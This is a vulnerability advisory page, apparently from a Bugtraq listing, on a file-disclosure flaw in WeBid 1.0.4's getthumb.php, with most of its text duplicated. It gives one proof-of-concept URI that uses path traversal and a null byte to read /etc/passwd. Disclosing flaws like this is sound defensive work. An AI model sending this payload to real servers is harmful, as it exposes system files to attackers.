WeBid 'getthumb.php' Remote File Disclosure Vulnerability
BID:55080
Info
WeBid 'getthumb.php' Remote File Disclosure Vulnerability
| Bugtraq ID: | 55080 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 17 2012 12:00AM |
| Updated: | Aug 17 2012 12:00AM |
| Credit: | Dun |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
WeBid 'getthumb.php' Remote File Disclosure Vulnerability
WeBid is prone to a remote file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
WeBid 1.0.4 is vulnerable; other versions may also be affected.
WeBid is prone to a remote file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
WeBid 1.0.4 is vulnerable; other versions may also be affected.
Exploit / POC
WeBid 'getthumb.php' Remote File Disclosure Vulnerability
Attackers may exploit this issue through a browser.
The following example URI is available:
http://www.example.com/WeBid/getthumb.php?fromfile=getthumb.php&w=../../../../../etc/passwd%00
Attackers may exploit this issue through a browser.
The following example URI is available:
http://www.example.com/WeBid/getthumb.php?fromfile=getthumb.php&w=../../../../../etc/passwd%00
Solution / Fix
WeBid 'getthumb.php' Remote File Disclosure Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].